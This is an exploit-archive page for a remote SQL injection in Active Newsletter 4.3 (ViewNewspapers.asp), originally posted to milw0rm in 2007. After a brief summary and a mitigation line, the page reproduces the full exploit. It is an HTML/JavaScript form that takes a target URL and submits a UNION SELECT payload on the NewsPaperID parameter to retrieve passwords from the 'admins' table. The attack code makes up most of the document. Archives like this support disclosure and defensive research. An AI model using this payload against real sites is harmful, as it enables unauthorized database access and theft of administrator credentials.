header-logo
Suggest Exploit
vendor:
Active Newsletter
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
Not mentioned
CWE
Product Name: Active Newsletter
Affected Version From: Version 4.3 and prior
Affected Version To: Version 4.3
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Active Newsletter <= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit

This is a remote SQL injection exploit in Active Newsletter version 4.3. The vulnerability exists in the ViewNewspapers.asp file. By manipulating the 'NewsPaperID' parameter, an attacker can execute arbitrary SQL queries and retrieve sensitive information, such as passwords from the 'admins' table.

Mitigation:

Patch or upgrade to a secure version of Active Newsletter.
Source

Exploit-DB raw data:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Active Newsletter <= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit</title>

<script language="JavaScript">
 
//'===============================================================================================
//'[Script Name: Active Newsletter <= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[S.Page     : http://www.activewebsoftwares.com
//'[$$         : $ 499.00
//'[Using      : Write Target after Submit Click
//'===============================================================================================

//# ajann,Turkey
//# ...

   

     //Basic exploit,but any time : ( 
   var path="/"
   var adres="/ViewNewspapers.asp?" //File name
   var acik ="NewsPaperID=" // Line x
   var sql = "-34535353534%20union%20select%20password%20from%20admins"
  
   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }


  
  rfi.action= document.rfi.target1.value+path+adres+acik+sql; // Ready Target : )
  rfi.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">Active Newsletter <= V.4.3 (ViewNewspapers.asp) Remote SQL Injection Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>
  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
  <p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</center>
</body>

</html>

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR